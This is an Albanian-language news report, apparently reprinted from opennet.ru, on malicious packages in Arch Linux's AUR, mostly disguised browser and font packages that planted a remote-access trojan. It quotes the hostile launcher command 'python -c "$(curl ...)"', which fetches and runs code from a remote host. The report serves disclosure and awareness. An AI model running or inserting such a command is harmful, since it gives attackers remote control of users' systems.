Në depozitat AUR të Arch Linux janë identifikuar edhe 6 paketa malinj

Në depozitarin AUR (Arch User Repository), i përdorur në Arch Linux për shpërndarjen e pakove nga zhvillues të tjerë, vazhdoi publikimi i kodit të keq, i integruar në pakot me ndërtimet jozyrtare të shfletuesve. Përveç pakove të dëmshme firefox-patch-bin, librewolf-fix-bin dhe zen-browser-patched-bin, që u identifikuan para dy javësh, në AUR u shtua paketa google-chrome-stable, e cila gjithashtu përmban një ndryshim që vendos një komponent të dëmshëm, duke ofruar akses të largët në sistem.

Në skedarin PKGBUILD të paketës problematike u identifikua vendosja e një skripti për të ekzekutuar shfletuesin google-chrome-stable.sh, ku ndër të tjera përmbante komandën 'python -c "$(curl https://segs.lol/9wUb1Z)"', e cila shkarkonte softuer të dëmshëm, i njohur nga shërbimi VirusTotal si Trojan Spark, i cili lejon menaxhimin e sistemit në distancë, nisjen e proceseve, transferimin e skedarëve, inspektimin e trafikut dhe dërgimin e fotografive të ekranit.

Paketën e dëmshme google-chrome-stable e kishin shkarkuar dy ditë më parë dhe u eliminua nga administratorët e AUR pas pak orësh nga shfaqja e saj. Pothuajse menjëherë pas heqjes së google-chrome-stable në AUR u ngarkuan dy paketa të tjera të dëmshme — 'chrome' dhe 'chrome-bin', të cilat përmbanin një skenar të ngjashëm për vendosjen e softuerit të dëmshëm në sistemin e përdoruesit.

Më pas u identifikuan edhe tri paketa të tjera me kod të keq: ttf-mac-fonts-all, ttf-ms-fonts-all dhe gromit.

Burimi: opennet.ru

Bleni hostim të besueshëm për faqe me mbrojtje nga DDoS, serverë VPS VDS 🔥 Bleni hostim të besueshëm për faqe me mbrojtje nga DDoS, serverë VPS VDS | ProHoster